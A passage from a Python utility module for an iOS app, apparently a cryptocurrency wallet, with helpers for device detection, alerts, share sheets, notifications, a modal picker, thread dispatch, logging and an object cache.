return True if UIScreen.mainScreen.scale > 1.0 else False
def is_iphone() -> bool:
return bool(UI_USER_INTERFACE_IDIOM() == UIUserInterfaceIdiomPhone)
def is_iphone5() -> bool:
# iphone5 has 1136 pix height
return is_iphone() and ( abs(UIScreen.mainScreen.nativeBounds.size.height - 1136.0) < 0.5 )
def is_iphone4() -> bool:
# iphone4 has <1136 pix height
return is_iphone() and ( UIScreen.mainScreen.nativeBounds.size.height - 1136.0 < -0.5 )
def is_iphoneX() -> bool:
if is_iphone():
def iphone_X_sizes() -> Tuple[CGSize]:
return (
CGSizeMake( 1125.0, 2436.0 ), # iPhone X & iPhone XS
CGSizeMake( 828.0, 1792.0 ), # iPhone XR
CGSizeMake( 1242.0, 2688.0 ), # iPhone XS Max
)
size = UIScreen.mainScreen.nativeBounds.size
for s in iphone_X_sizes():
if abs(s.width - size.width) < 0.5 and abs(s.height - size.height) < 0.5:
return True
return False
def is_ipad() -> bool:
return not is_iphone()
def is_landscape() -> bool:
o = UIApplication.sharedApplication.statusBarOrientation
return bool(o in [UIInterfaceOrientationLandscapeLeft,UIInterfaceOrientationLandscapeRight])
def is_portrait() -> bool:
return not is_landscape()
def is_debug_build() -> bool:
return bool(HelpfulGlue.isDebugBuild())
def is_simulator() -> bool:
return bool(HelpfulGlue.isSimulator())
def get_fn_and_ext(fileName: str) -> tuple:
*p1, ext = fileName.split('.')
fn=''
if len(p1) is 0:
fn = ext
ext = None
else:
fn = '.'.join(p1)
return (fn,ext)
def get_user_dir():
dfm = NSFileManager.defaultManager
# documents dir
thedir = dfm.URLsForDirectory_inDomains_(9, 1).objectAtIndex_(0)
return str(thedir.path)
def get_tmp_dir():
return str(ObjCInstance(uikit.NSTemporaryDirectory()))
def uiview_set_enabled(view : ObjCInstance, b : bool) -> None:
if view is None: return
view.userInteractionEnabled = bool(b)
view.alpha = float(1.0 if bool(b) else 0.3)
view.setNeedsDisplay()
def pathsafeify(s : str) -> str:
return s.translate({ord(i):None for i in ':/.\$#@[]}{*?'}).strip()
def cleanup_tmp_dir():
t0 = time.time()
d = get_tmp_dir()
ct = 0
tot = 0
import glob
if os.path.isdir(d):
it = glob.iglob(os.path.join(d,'*'))
for f in it:
tot += 1
try:
os.remove(f)
ct += 1
except:
#NSLog("Cleanup Tmp Dir: failed to remove tmp file: %s", f)
pass
if tot:
NSLog("Cleanup Tmp Dir: removed %d/%d files from tmp dir in %f ms",ct,tot,(time.time()-t0)*1e3)
def ios_version_string() -> str:
return "%s %s %s (%s)"%ios_version_tuple_full()
_VER_TUP_FULL = None
def ios_version_tuple_full() -> Tuple[str]:
global _VER_TUP_FULL
if _VER_TUP_FULL is None:
dev = UIDevice.currentDevice
_VER_TUP_FULL = (str(dev.systemName), str(dev.systemVersion), str(dev.model), str(dev.identifierForVendor))
return _VER_TUP_FULL
_VER_TUP = None
def ios_version_tuple() -> Tuple[int]:
global _VER_TUP
if _VER_TUP is None:
def parse_tup():
try:
sv = ios_version_tuple_full()[1].split('.')
while len(sv) < 3: # because we can never rely on Apple not making this have 2 or 4 elements, etc...
sv += ['0']
sv = tuple(int(x) for x in sv) # convert to tuple
return sv
except (IndexError, TypeError, ValueError) as e:
print("ERROR in ios_version_tuple, cannot parse", sv, " -- returning (0,0,0); exception was:", repr(e))
return 0,0,0
_VER_TUP = parse_tup()
return _VER_TUP
# new color schem from Max
_ColorScheme = None
def uicolor_custom(name : str) -> ObjCInstance:
global _ColorScheme
name = name.strip().lower() if name else ""
if not _ColorScheme:
# initialize it on first call. We don't initialize it on initial module load to shave a few mss off app loading time.
_ColorScheme = {
'dark' : UIColor.colorInDeviceRGBWithHexString_("#414141").retain(),
'light' : UIColor.colorInDeviceRGBWithHexString_("#CCCCCC").retain(),
'ultralight': UIColor.colorInDeviceRGBWithHexString_("#F6F6F6").retain(),
'nav' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'link' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'linktapped': UIColor.colorInDeviceRGBWithHexString_("#FF8BFF").retain(),
'navtint' : UIColor.colorInDeviceRGBWithHexString_("#FFFFFF").retain(),
'red' : UIColor.colorInDeviceRGBWithHexString_("#FF6161").retain(),
'notif' : UIColor.colorInDeviceRGBWithHexString_("#BBFF3B").retain(), # very bright green
'green' : UIColor.colorInDeviceRGBWithHexString_("#9BDF1B").retain(), # less bright green
}
schemecolor = _ColorScheme.get(name, None)
if schemecolor:
return schemecolor
# other, old-style colors. These will be removed once we fully transition to new UI style
if name in ['blue', 'myblue', 'tf', 'password']:
return UIColor.colorWithRed_green_blue_alpha_(0.91746425629999995, 0.95870447160000005, 0.99979293349999998, 1.0)
if name in ['change', 'changeaddress', 'change address']:
return UIColor.colorWithRed_green_blue_alpha_(1.0,0.9,0.3,0.3)
if name in ['frozen', 'frozenaddress', 'frozen address']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.125)
if name in ['frozentext', 'frozen text', 'frozenaddresstext', 'frozen address text']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,1.0)
if name in ['frozentextbright', 'frozen text bright', 'frozenaddresstextbright', 'frozen address text bright']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.8,0.8,1.0)
if name in ['frozentextlight', 'frozen text light', 'frozenaddresstextlight', 'frozen address text light']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.4)
NSLog("uicolor_custom: UNKNOWN custom color '%s' -- returning GRAY -- FIXME"%(str(name)))
return UIColor.grayColor
def tintify(t : ObjCInstance) -> ObjCInstance:
# setup nav tint colors
t.navigationBar.setTranslucent_(False)
t.navigationBar.barTintColor = uicolor_custom('nav')
t.navigationBar.tintColor = uicolor_custom('navtint')
t.navigationBar.barStyle = UIBarStyleBlack
return t
def ats_replace_font(ats : NSAttributedString, font: UIFont) -> NSMutableAttributedString:
out = NSMutableAttributedString.alloc().initWithAttributedString_(ats)
r = NSRange(0, out.length())
out.removeAttribute_range_(NSFontAttributeName, r)
out.addAttribute_value_range_(NSFontAttributeName, font, r)
return out
def uitf_redo_attrs(tf : ObjCInstance) -> None:
weight = UIFontWeightMedium if tf.tag == 1 else UIFontWeightRegular
# TESTING ATTRIBUTED STRING STUFF..
# 1. Placeholder
ats = NSMutableAttributedString.alloc().initWithString_(tf.placeholder).autorelease()
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.italicSystemFontOfSize_(14.0), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('light'), r)
ps = NSMutableParagraphStyle.new().autorelease()
ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
ps.lineBreakMode = NSLineBreakByTruncatingMiddle
indent = nspy_get_byname(tf, 'indent_override')
if isinstance(indent, (float, int)):
indent = float(indent)
else:
indent = 10.0 if tf.isUserInteractionEnabled() else 0.0
ps.firstLineHeadIndent = indent
ps.tailIndent = -indent
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedPlaceholder = ats
# 2. Actual text
ats = NSMutableAttributedString.alloc().initWithString_(tf.text)
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.systemFontOfSize_weight_(14.0, weight), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('dark'), r)
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedText = ats
# NB: This isn't normally called since you need to specify the full pathname of the resource you want, instead
# if you need images, call uiimage_get, etc. This does NOT search recursively, since NSBundle sucks.
def get_bundle_resource_path(fileName: str, directory: str = None) -> str:
fn,ext = get_fn_and_ext(fileName)
if directory is None:
return NSBundle.mainBundle.pathForResource_ofType_(fn, ext)
return NSBundle.mainBundle.pathForResource_ofType_inDirectory_(fn, ext, directory)
def nsattributedstring_from_html(html : str) -> ObjCInstance:
data = ns_from_py(html.encode('utf-8'))
return NSMutableAttributedString.alloc().initWithHTML_documentAttributes_(data,None).autorelease()
def uilabel_replace_attributed_text(lbl : ObjCInstance, text : str, template : ObjCInstance = None, font : ObjCInstance = None) -> ObjCInstance:
if not isinstance(template, NSAttributedString):
template = lbl.attributedText
if template is None:
template = NSAttrubutedString.new().autorelease()
astr = NSMutableAttributedString.alloc().initWithAttributedString_(template).autorelease()
astr.replaceCharactersInRange_withString_(NSRange(0,astr.length()), text)
if font:
r = NSRange(0,astr.length())
astr.removeAttribute_range_(NSFontAttributeName,r)
astr.addAttribute_value_range_(NSFontAttributeName,font,r)
lbl.attributedText = astr
return lbl
def nsurl_read_local_file(url : ObjCInstance, binary = False) -> tuple:
try:
cstring = NSMutableData.dataWithLength_(4096)
from ctypes import c_char_p
url.getFileSystemRepresentation_maxLength_(c_char_p(cstring.mutableBytes), 4096)
filename = py_from_ns(cstring)
nul = filename.find(b'\0')
if nul >= 0:
filename = filename[:nul]
filename = filename.decode('utf-8')
mode = "r"
if binary: mode = "rb"
with open(filename, mode) as f:
data = f.read()
#print("File data:\n",data)
return data, filename
except:
NSLog("nsurl_read_local_file got exception: %s",str(sys.exc_info()[1]))
return None, None
_threading_original__init__ = None
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
global _threading_original__init__
if _threading_original__init__:
NSLog("*** ERROR: setup_thread_excepthook already called once in this app!")
return
_threading_original__init__ = threading.Thread.__init__
def MyInit(self, *args, **kwargs):
_threading_original__init__(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except ConnectionError:
NSLog("ConnectionError: %s",str(sys.exc_info()[1]))
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = MyInit
def cleanup_thread_excepthook():
global _threading_original__init__
if _threading_original__init__:
threading.Thread.__init__ = _threading_original__init__
_threading_original__init__ = None
###################################################
### Show Share ActionSheet
###################################################
def show_share_actions(vc : ObjCInstance,
fileName : str = None,
text : str = None,
url : NSURL = None,
img : UIImage = None,
excludedActivityTypes = None,
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
ipadAnchor : object = None,
animated : bool = True,
finishedCompletion: Callable[[], str] = None, # optional completion function that gets called when alert is finished. the string passed is the UIActivityType the user selected, or None if the user cancelled the activity
objectName : str = None # the descriptive name of the object eg 'File' or 'Transaction' or 'Wallet', translated
) -> ObjCInstance:
objectName = _("File") if not objectName or not isinstance(objectName, str) else objectName
items = []
if fileName:
items.append(NSURL.fileURLWithPath_(fileName))
if isinstance(text, str):
items.append(ns_from_py(text))
if isinstance(url, NSURL):
items.append(url)
if isinstance(img, UIImage):
items.append(img)
avc = UIActivityViewController.alloc().initWithActivityItems_applicationActivities_(items, None).autorelease()
if excludedActivityTypes is None:
excludedActivityTypes = [
UIActivityTypePostToFacebook,
UIActivityTypePostToTwitter,
UIActivityTypePostToWeibo,
UIActivityTypeAssignToContact,
UIActivityTypeSaveToCameraRoll,
UIActivityTypeAddToReadingList,
UIActivityTypePostToFlickr,
UIActivityTypePostToVimeo,
UIActivityTypePostToTencentWeibo,
UIActivityTypeOpenInIBooks,
]
if isinstance(img, UIImage):
excludedActivityTypes.remove(UIActivityTypeSaveToCameraRoll)
avc.excludedActivityTypes = excludedActivityTypes
if is_ipad():
popover = avc.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
def onCompletion() -> None:
if completion is not None:
#print("Calling completion callback..")
completion()
def ActivityCompletion(s : objc_id, completed : bool, arr : objc_id, err : objc_id) -> None:
activity = py_from_ns(ObjCInstance(s)) if completed else None
def DoUserCompl() -> None:
if callable(finishedCompletion):
finishedCompletion(activity)
print('activity =',activity)
if err and err.value:
err = ObjCInstance(err)
show_alert(vc = vc, title = "Error", message = str(err), actions = [ [_('OK'), DoUserCompl] ])
else:
DoUserCompl()
if activity is None: return
if activity in (py_from_ns(UIActivityTypeCopyToPasteboard)):
show_notification(message = _("{} copied to clipboard").format(objectName))
elif activity in ('com.apple.CloudDocsUI.AddToiCloudDrive', py_from_ns(UIActivityTypeAirDrop)):
show_notification(message = _("{} saved successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypeMessage),py_from_ns(UIActivityTypeMail)):
show_notification(message = _("{} sent successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypePrint)):
show_notification(message = _("{} sent to printer").format(objectName))
elif activity in (py_from_ns(UIActivityTypeSaveToCameraRoll)):
show_notification(message = _("{} saved to photo library").format(objectName))
else:
show_notification(message = _("{} exported successfully").format(objectName))
avc.completionWithItemsHandler = Block(ActivityCompletion)
vc.presentViewController_animated_completion_(avc,animated,onCompletion)
return avc
###################################################
### Show modal alert
###################################################
def show_please_wait(vc : ObjCInstance, message : str, animated : bool = True, completion : Callable[[],None] = None,
title: str = None) -> ObjCInstance:
pw = None
try:
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("PleaseWait", None, None)
for o in objs:
if isinstance(o, PleaseWaitVC):
pw = o
break
except:
NSLog("Could not load PleaseWait.nib:",sys.exc_info()[1])
title = title or _("Please wait")
if not pw:
return show_alert(vc, title = title, message = message, actions = [], animated = animated, completion = completion)
pw.message.text = message
pw.pleaseWait.text = title
vc.presentViewController_animated_completion_(pw, animated, completion)
return pw
def show_alert(vc : ObjCInstance, # the viewcontroller to present the alert view in
title : str, # the alert title
message : str, # the alert message
# actions is a list of lists: each element has: Button names, plus optional callback spec
# each element of list is [ 'ActionTitle', callable, arg1, arg2... ] for optional callbacks
actions: list = [ ['Ok'] ], # default has no callbacks and shows Ok button
cancel: str = None, # name of the button you want to designate as 'Cancel' (ends up being first)
destructive: str = None, # name of the button you want to designate as destructive (ends up being red)
style: int = UIAlertControllerStyleAlert, #or: UIAlertControllerStyleActionSheet
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
animated: bool = True, # whether or not to animate the alert
localRunLoop: bool = False, # whether or not to create a local event loop and block until dialog finishes.. useful for full stop error messages and/or password dialogs
uiTextFieldHandlers : list = None, # if you want to create custom UITextFields in this alert, and the alert'ss type is UIAlertControllerStyleAlert, pass a list of fully annotated callbacks taking an objc_id as arg and returning None, one for each desired text fields you want to create
ipadAnchor : object = None # A CGRect -- use this on ipad to specify an anchor if using UIAlertControllerStyleActionSheet
) -> ObjCInstance:
if localRunLoop:
NSLog("\n***\n*** WARNING -- 'localRunLoop' on modal dialogs is pretty buggy, as it turns out. Please fix the calling code to not use it!\n***")
if not NSThread.currentThread.isMainThread:
raise Exception('utils.show_alert can only be called from the main thread!')
alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_(title, message, style)
if uiTextFieldHandlers:
if style != UIAlertControllerStyleAlert:
raise ValueError('Cannot combine uiTextFieldHandlers with non-UIAlertControllerStyleAlert alerts!')
for h in uiTextFieldHandlers:
alert.addTextFieldWithConfigurationHandler_(Block(h)) # let's hope h is a callable of the right type with the right number of args else exception will be thrown here
if type(actions) is dict:
acts = []
for k in actions.keys():
if actions[k] is not None:
acts.append([k,*actions[k]])
else:
acts.appens([k])
actions = acts
ct=0
fun_args_dict = dict()
got_callback = False
for i,arr in enumerate(actions):
has_callable = False
fun_args = []
if type(arr) is list or type(arr) is tuple:
actTit = arr[0]
fun_args = arr[1:]
has_callable = True
else:
actTit = arr
style = UIAlertActionStyleCancel if actTit == cancel else UIAlertActionStyleDefault
style = UIAlertActionStyleDestructive if actTit == destructive else style
def onAction(act_in : objc_id) -> None:
act = ObjCInstance(act_in)
fargs = fun_args_dict.get(act.ptr.value,[])
nonlocal got_callback
got_callback = True
if len(fargs):
#print("Calling action...")
fargs[0](*fargs[1:])
act = UIAlertAction.actionWithTitle_style_handler_(actTit,style,onAction)
fun_args_dict[act.ptr.value] = fun_args
alert.addAction_(act)
ct+=1
def onCompletion() -> None:
#print("On completion called..")
nonlocal got_callback, alert
if not actions: got_callback = True
if completion is not None:
#print("Calling completion callback..")
sig = signature(completion)
if len(sig.parameters) > 0:
completion(alert.ptr)
else:
completion()
if is_ipad() and alert.preferredStyle == UIAlertControllerStyleActionSheet:
popover = alert.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
vc.presentViewController_animated_completion_(alert,animated,onCompletion)
if localRunLoop:
while not got_callback:
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
return None
return alert
# Useful for doing a "Please wait..." style screen that takes itself offscreen automatically after a delay
# (may end up using this for some info alerts.. not sure yet)
def show_timed_alert(vc : ObjCInstance, title : str, message : str,
timeout : float, style : int = UIAlertControllerStyleAlert, animated : bool = True) -> ObjCInstance:
assert NSThread.currentThread.isMainThread
alert = None
def completionFunc() -> None:
def dismisser() -> None:
vc.dismissViewControllerAnimated_completion_(animated,None)
call_later(timeout, dismisser)
alert=show_alert(vc=vc, title=title, message=message, actions=[], style=style, completion=completionFunc)
return alert
# Useful for showing an alert with a single UITextField for user input of data
def show_tf_alert(vc : ObjCInstance, title : str, message : str,
completion : Callable[[],None] = None, placeholder : str = "Tap to input", text : str = "",
adjustsFontSizeToFitWidth = True, minimumFontSize = 9.0, clearButtonAlwaysVisible = True,
onOk : Callable[[],str] = None, onCancel : Callable[[],None] = None, animated : bool = True,
secureTextEntry = False, autocapitalizationType = UITextAutocapitalizationTypeNone,
autocorrectionType = UITextAutocorrectionTypeNo, spellCheckingType = UITextSpellCheckingTypeNo) -> ObjCInstance:
tf = None
def SetupTF(tfo : objc_id) -> None:
nonlocal tf
tf = ObjCInstance(tfo).retain() # need to retain it because it will get released when dialog goes away, but we want its data in MyOnOk below..
tf.placeholder = placeholder if placeholder else ''
tf.adjustsFontSizeToFitWidth = adjustsFontSizeToFitWidth
tf.minimumFontSize = minimumFontSize
tf.clearButtonMode = UITextFieldViewModeAlways if clearButtonAlwaysVisible else UITextFieldViewModeWhileEditing
tf.secureTextEntry = secureTextEntry
tf.autocapitalizationType = autocapitalizationType
tf.autocorrectionType = autocorrectionType
tf.spellCheckingType = spellCheckingType
tf.text = text if text else ''
def MyOnCancel() -> None:
nonlocal tf
tf.release()
tf = None
if callable(onCancel):
onCancel()
def MyOnOk() -> None:
nonlocal tf
userInput = tf.text
tf.release()
tf = None
if callable(onOk):
onOk(userInput)
return show_alert(vc = vc, title = title, message = message, completion = completion, cancel = _('Cancel'), animated = animated,
uiTextFieldHandlers = [ SetupTF ], actions = [ [ _('OK'), MyOnOk ], [ _('Cancel'), MyOnCancel ] ])
###################################################
### Calling callables later or from the main thread
###################################################
def do_in_main_thread(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
return None
def do_in_main_thread_sync(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, True)
return None
def do_in_main_thread_async(func : Callable, *args) -> None:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
def call_later(timeout : float, func : Callable, *args) -> ObjCInstance:
timer = None
if not NSThread.currentThread.isMainThread:
# NB: From NSRunLoop docs -- messing with the run loop from another thread is bad bad bad since NSRunLoop is not thread safe
# so we force this scheduling of the NSTiemr to happen on the main thread... using dispatch_queue tricks in HelpfulGlue.
#NSLog("****** WARNING WARNING WARNING -- utils.call_later() called from outside the main thread! FIXME!!!! ******")
def inMain() -> None:
nonlocal timer
timer = call_later(timeout, func, *args)
HelpfulGlue.performBlockInMainThread_sync_(inMain, True)
else:
def OnTimer(t_in : objc_id) -> None:
t = ObjCInstance(t_in)
func(*args)
if t: t.invalidate()
timer = NSTimer.timerWithTimeInterval_repeats_block_(timeout, False, OnTimer)
NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)
return timer
###
### Modal picker stuff
###
class UTILSModalPickerHelper(UIViewController):
''' This class has this funny name because in the obj-c space, all class names are in the global namespace
and as this class really is a private class to utils.py, we name it using the UTILS prefix to keep things
isolated. '''
items = objc_property()
lastSelection = objc_property()
needsDismiss = objc_property()
@objc_method
def init(self) -> ObjCInstance:
self = ObjCInstance(send_super(__class__, self,'init'))
if self:
self.items = None
self.lastSelection = 0
self.needsDismiss = False
self.modalPresentationStyle = UIModalPresentationOverFullScreen
return self
@objc_method
def dealloc(self) -> None:
self.finished()
remove_all_callbacks(self)
self.needsDismiss = None
# print("UTILSModalPickerHelper dealloc")
send_super(__class__, self, 'dealloc')
@objc_method
def numberOfComponentsInPickerView_(self, p : ObjCInstance) -> int:
return 1
@objc_method
def pickerView_numberOfRowsInComponent_(self, p : ObjCInstance, component : int) -> int:
assert component == 0
return len(self.items)
@objc_method
def pickerView_didSelectRow_inComponent_(self, p : ObjCInstance, row : int, component : int) -> None:
assert component == 0 and row < len(self.items)
self.lastSelection = row
@objc_method
def pickerView_titleForRow_forComponent_(self, p : ObjCInstance, row : int, component : int) -> ObjCInstance:
txt = ''
if component == 0 and row < len(self.items): txt = self.items[row]
return txt
@objc_method
def onOk_(self, but : ObjCInstance) -> None:
# print ("Ok pushed")
cb = get_callback(self, 'onOk')
if callable(cb):
sig = signature(cb)
params = sig.parameters
if len(params) > 0:
cb(int(self.lastSelection if self.lastSelection else 0))
else:
cb()
self.finished()
@objc_method
def onCancel_(self, but : ObjCInstance) -> None:
# print ("Cancel pushed")
self.finished()
@objc_method
def finished(self) -> None:
if self.viewIfLoaded and self.needsDismiss:
self.dismissViewControllerAnimated_completion_(True, None)
self.items = None
self.lastSelection = None
self.needsDismiss = False
###################################################
### Modal picker
###################################################
def present_modal_picker(parentVC : ObjCInstance,
items : list,
selectedIndex : int = 0,
okCallback : Callable[[int],None] = None,
okButtonTitle : str = "OK",
cancelButtonTitle : str = "Cancel") -> ObjCInstance:
assert parentVC is not None and items is not None and len(items)
if not isinstance(items, list):
items = list(items) # will raise if not compatible type
helper = UTILSModalPickerHelper.new().autorelease()
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("ModalPickerView",helper,None)
if not objs: raise Exception("Could not load ModalPickerView nib!")
mpv = helper.view # auto-attached by NIB loader above because connection was made in NIB to file's owner.view
p = mpv.viewWithTag_(200) # note UIPickerView p is auto-connected to helper as dataSource and delegate by NIB
okBut = mpv.viewWithTag_(1)
cancelBut = mpv.viewWithTag_(2)
cancelBut.layer.borderColor = uicolor_custom('nav').CGColor
helper.items = items
if okButtonTitle is not None: okBut.setTitle_forState_(okButtonTitle, UIControlStateNormal)
if cancelButtonTitle is not None: cancelBut.setTitle_forState_(cancelButtonTitle, UIControlStateNormal)
if okBut and cancelBut:
okBut.addTarget_action_forControlEvents_(helper, SEL(b'onOk:'), UIControlEventPrimaryActionTriggered)
cancelBut.addTarget_action_forControlEvents_(helper, SEL(b'onCancel:'), UIControlEventPrimaryActionTriggered)
else:
raise Exception('Picker NIB loaded but could not find the OK or Cancel button views! FIXME!')
if callable(okCallback): add_callback(helper, 'onOk', okCallback)
if selectedIndex > 0 and selectedIndex < len(items):
p.selectRow_inComponent_animated_(selectedIndex, 0, False)
helper.lastSelection = selectedIndex
parentVC.view.endEditing_(True) # NB: do not use setDisablesAutomaticKeyboardDismissal because it is missing on newer iOS! (caused an app crash) -- so we do this instead
parentVC.presentViewController_animated_completion_(helper, True, None)
helper.needsDismiss = True
return helper
###################################################
### Banner (status bar) notifications
###################################################
def show_notification(message : str,
duration : float = 2.0, # the duration is in seconds may be None but in that case must specify a completion
color : tuple = None, # color needs to have r,g,b,a components -- length 4, or be a UIColor
textColor : tuple = None, # color needs to have r,g,b,a components or be a UIColor
font : ObjCInstance = None,
style : int = CWNotificationStyleStatusBarNotification,
animationStyle : int = CWNotificationAnimationStyleTop,
animationType : int = CWNotificationAnimationTypeReplace,
animationDuration : float = 0.25, # the amount of time to animate in and out the notif
onTapCallback : Callable[[],None] = None, # the function to call if user taps notification -- should return None and take no args
multiline : bool = False,
noTapDismiss : bool = False,
completion : callable = None, # if you want to use the completion handler, set duration to None
) -> ObjCInstance:
cw_notif = CWStatusBarNotification.new().autorelease()
already_dismissed = False
def onTap() -> None:
#print("onTap")
if onTapCallback is not None: onTapCallback()
if not cw_notif.notificationIsDismissing and not noTapDismiss:
def _compl() -> None:
nonlocal already_dismissed
if not already_dismissed:
already_dismissed = True
ios13_status_bar_workaround.pop()
cw_notif.dismissNotificationWithCompletion_(_compl)
if isinstance(color, UIColor):
pass
elif color is None or not isinstance(color, (tuple, list)) or len(color) != 4 or [c for c in color if type(c) not in [float,int] ]:
color = uicolor_custom('notif')
else:
color = UIColor.colorWithRed_green_blue_alpha_(*color)
if isinstance(textColor, UIColor):
pass
elif textColor is None or not isinstance(textColor, (tuple, list)) or len(textColor) != 4 or [c for c in textColor if type(c) not in [float,int] ]:
textColor = uicolor_custom('dark')
else:
textColor = UIColor.colorWithRed_green_blue_alpha_(*textColor)
if not isinstance(font, UIFont):
font = UIFont.systemFontOfSize_weight_(12, UIFontWeightMedium)
# set default blue color (since iOS 7.1, default window tintColor is black)
cw_notif.notificationLabelBackgroundColor = color
cw_notif.notificationLabelTextColor = textColor
cw_notif.notificationLabelFont = font
cw_notif.notificationStyle = style
cw_notif.notificationAnimationInStyle = animationStyle
cw_notif.notificationAnimationOutStyle = animationStyle
cw_notif.notificationAnimationType = animationType
cw_notif.notificationAnimationDuration = animationDuration
cw_notif.multiline = multiline
message = str(message)
duration = float(duration) if duration is not None else None
cw_notif.notificationTappedBlock = onTap
ios13_status_bar_workaround.push()
if duration is None and completion is not None:
def _compl() -> None: completion()
cw_notif.displayNotificationWithMessage_completion_(message, _compl)
else:
if duration is None: duration = 2.0
def _compl() -> None:
nonlocal already_dismissed
if not already_dismissed:
already_dismissed = True
ios13_status_bar_workaround.pop()
cw_notif.displayNotificationWithMessage_forDuration_dismissedCompletion_(message, duration, _compl)
return cw_notif
def dismiss_notification(cw_notif : ObjCInstance) -> None:
if cw_notif is not None and not cw_notif.notificationIsDismissing:
def _compl() -> None: ios13_status_bar_workaround.pop()
cw_notif.dismissNotificationWithCompletion_(_compl)
#######################################################
### NSLog emulation -- python wrapper for NSLog
#######################################################
NSLOG_SUPPRESS = False
def NSLogSuppress(b : bool) -> None:
global NSLOG_SUPPRESS
NSLOG_SUPPRESS = b
def NSLog(fmt : str, *args) -> int:
if NSLOG_SUPPRESS:
return
args = list(args)
if isinstance(fmt, ObjCInstance):
fmt = str(py_from_ns(fmt))
fmt = fmt.replace("%@","%s")
for i,a in enumerate(args):
if isinstance(a, ObjCInstance):
try:
args[i] = str(a.description)
except Exception as e0:
#print("Exception on description call: %s"%str(e0))
try:
args[i] = str(py_from_ns(a))
except Exception as e:
print("Cannot convert NSLog argument %d to str: %s"%(i+1,str(e)))
args[i] = "<Unknown>"
try:
formatted = ns_from_py("{}".format(fmt%tuple(args)))
# NB: we had problems with ctypes and variadic functions due to ARM64 ABI weirdness. So we do this.
HelpfulGlue.NSLogString_(formatted)
except Exception as e:
print("<NSLog Emul Exception> : %s"%(str(e)))
formatted = "[NSLog Unavailable] {}".format(fmt%tuple(args))
print(formatted)
####################################################################
# NS Object Cache
#
# Store frequently used objc instances in a semi-intelligent, auto-
# retaining dictionary, complete with automatic low-memory-warning
# detection.
####################################################################
class NSObjCache:
def __init__(self, maxSize : int = 4, name : str = "Unnamed"):
self._cache = dict()
maxSize = 4 if type(maxSize) not in [float, int] or maxSize < 1 else int(maxSize) # C-programmer paranoia. ;)
self._max = maxSize
self._name = name
self._last = None
def lowMemory(notificaton : ObjCInstance) -> None:
# low memory warning -- loop through cache and release all cached images
ct = 0
for k in self._cache.keys():
self._cache[k].release()
ct += 1
self._cache = dict()
self._last = None
if ct: NSLog("Low Memory: Flushed %d objects from '%s' NSObjCache."%(ct,self._name))
self._token = NSNotificationCenter.defaultCenter.addObserverForName_object_queue_usingBlock_(
UIApplicationDidReceiveMemoryWarningNotification,
UIApplication.sharedApplication,
None,
lowMemory
).retain()
def __del__(self):
while len(self): self.release1()
if self._token is not None:
NSNotificationCenter.defaultCenter.removeObserver_(self._token.autorelease())
self._token = None
def release1(self):
keez = list(self._cache.keys())
while len(keez): # this normally only iterates once
k = keez[random.randrange(len(keez))]
if len(keez) > 1 and k is not None and self._last is not None and k == self._last:
# never expire the 'latest' item from the cache, unless the cache is of size 1
continue
self._cache.pop(k).release()
if k == self._last: self._last = None
break # end after 1 successful iteration
def put(self, key, obj : ObjCInstance):
if self._cache.get(key,None) is not None: return
while len(self) >= self._max:
self.release1()
#print("NSObjCache %s expired an object from full cache"%(self._name))
self._cache[key] = obj.retain()
#print("Cache %s size now %d"%(self._name,len(self)))
def get(self, key) -> ObjCInstance: # returns None on cache miss
ret = self._cache.get(key, None)
#if ret is not None: print("NSObjCache %s hit"%(self._name))
#else: print("NSObjCache %s miss"%(self._name))
self._last = key
return ret
def __len__(self):
return len(self._cache)
#############################
# Shows a QRCode
#############################
_qr_cache = NSObjCache(10,"QR UIImage Cache")
def present_qrcode_vc_for_data(vc : ObjCInstance, data : str, title : str = "QR Code") -> ObjCInstance:
